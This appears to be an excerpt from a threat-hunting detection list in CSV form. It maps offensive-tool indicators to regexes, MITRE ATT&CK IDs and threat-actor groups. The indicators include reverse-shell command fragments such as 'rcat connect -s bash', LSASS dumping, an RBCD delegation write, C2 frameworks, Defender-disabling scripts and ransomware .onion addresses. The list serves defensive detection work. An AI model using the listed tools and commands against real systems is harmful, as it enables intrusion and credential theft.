"*RasmanPotato-master*",".{0,1000}RasmanPotato\-master.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56284"
"*rastamouse.me/dumping-lsass-with-duplicated-handles*",".{0,1000}rastamouse\.me\/dumping\-lsass\-with\-duplicated\-handles.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","56285"
"*rasta-mouse/PPEnum*",".{0,1000}rasta\-mouse\/PPEnum.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","56286"
"*rasta-mouse/RuralBishop*",".{0,1000}rasta\-mouse\/RuralBishop.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","56287"
"*rasta-mouse/SharpC2*",".{0,1000}rasta\-mouse\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","56288"
"*rasta-mouse/ThreatCheck*",".{0,1000}rasta\-mouse\/ThreatCheck.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","56289"
"*rasta-mouse/TikiTorch*",".{0,1000}rasta\-mouse\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","56290"
"*rat communications are NOT SECURE. Do not send sensitive info through the C2 channel unless using SSL*",".{0,1000}rat\scommunications\sare\sNOT\sSECURE\.\sDo\snot\ssend\ssensitive\sinfo\sthrough\sthe\sC2\schannel\sunless\susing\sSSL.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","56291"
"*ratchatPT*/bin/bash*",".{0,1000}ratchatPT.{0,1000}\/bin\/bash.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","#linux","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56292"
"*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56293"
"*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56294"
"*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56295"
"*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56296"
"*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56297"
"*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56298"
"*raw*/straight-shooter.c*",".{0,1000}raw.{0,1000}\/straight\-shooter\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","56303"
"*raw.githubusercontent.com/6nz/virustotal-vm-blacklist/*",".{0,1000}raw\.githubusercontent\.com\/6nz\/virustotal\-vm\-blacklist\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","56385"
"*raw.githubusercontent.com/Flangvik/statistically-likely-usernames/*",".{0,1000}raw\.githubusercontent\.com\/Flangvik\/statistically\-likely\-usernames\/.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","56386"
"*raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1*",".{0,1000}raw\.githubusercontent\.com\/peass\-ng\/PEASS\-ng\/master\/winPEAS\/winPEASps1\/winPEAS\.ps1.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","56387"
"*raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection*",".{0,1000}raw\.githubusercontent\.com\/swagkarna\/Bypass\-Tamper\-Protection.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","56388"
"*raw_keylogger *","raw_keylogger\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","56389"
"*raw_keylogger.tar.gz*",".{0,1000}raw_keylogger\.tar\.gz.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","56390"
"*raworldw32b2qxevn3gp63pvibgixr4v75z62etlptg3u3pmajwra4ad.onion*",".{0,1000}raworldw32b2qxevn3gp63pvibgixr4v75z62etlptg3u3pmajwra4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56391"
"*rawrelayserver.py*",".{0,1000}rawrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56392"
"*rawSHA1_linkedIn_fmt_plug*",".{0,1000}rawSHA1_linkedIn_fmt_plug.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56393"
"*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *",".{0,1000}rbcd\.py\s\-delegate\-from\s.{0,1000}\s\-delegate\-to\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-action\swrite\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56394"
"*rbcd.py*",".{0,1000}rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56395"
"*RBCD_Petitpotam_VulnerableServers.txt*",".{0,1000}RBCD_Petitpotam_VulnerableServers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","56396"
"*rbsec/dnscan*",".{0,1000}rbsec\/dnscan.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","56397"
"*rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion*",".{0,1000}rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56398"
"*rc4.py *.bin*",".{0,1000}rc4\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","56399"
"*Rc4::new(b""This is nerdy .. im the key :)""*",".{0,1000}Rc4\:\:new\(b\""This\sis\snerdy\s\.\.\sim\sthe\skey\s\:\)\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","56400"
"*rcan listen -ib *",".{0,1000}rcan\slisten\s\-ib\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56401"
"*rcat c -s bash *",".{0,1000}rcat\sc\s\-s\sbash\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56402"
"*rcat connect -s bash*",".{0,1000}rcat\sconnect\s\-s\sbash.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56403"
"*rcat connect -s sh *",".{0,1000}rcat\sconnect\s\-s\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56404"
"*rcat listen 55660*",".{0,1000}rcat\slisten\s55660.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56405"
"*rcat listen -ie *",".{0,1000}rcat\slisten\s\-ie\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56406"
"*rcat listen -l *",".{0,1000}rcat\slisten\s\-l\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56407"
"*rcat-v3.*darwin-aarch64*",".{0,1000}rcat\-v3\..{0,1000}darwin\-aarch64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56408"
"*rcat-v3.*-darwin-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-darwin\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56409"
"*rcat-v3.*-linux-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-linux\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56410"
"*RCE-exploits*",".{0,1000}RCE\-exploits.{0,1000}","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","N/A","8","746","179","2023-12-11T22:30:33Z","2018-02-13T11:23:40Z","56411"
"*RCStep/RedTeam_Tools_n_Stuff*",".{0,1000}RCStep\/RedTeam_Tools_n_Stuff.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","56430"
"*RDE1-main.zip*",".{0,1000}RDE1\-main\.zip.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","56434"
"*rdi_net_user.cpp*",".{0,1000}rdi_net_user\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","56437"
"*RDP Recognizer Login Parser*",".{0,1000}RDP\sRecognizer\sLogin\sParser.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","56438"
"*rdp_check.py*",".{0,1000}rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56441"
"*rdp_doublepulsar_rce.*",".{0,1000}rdp_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56442"
"*rdp+kerberos-password://*?dc=*proxytype*proxyhost*",".{0,1000}rdp\+kerberos\-password\:\/\/.{0,1000}\?dc\=.{0,1000}proxytype.{0,1000}proxyhost.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","56443"
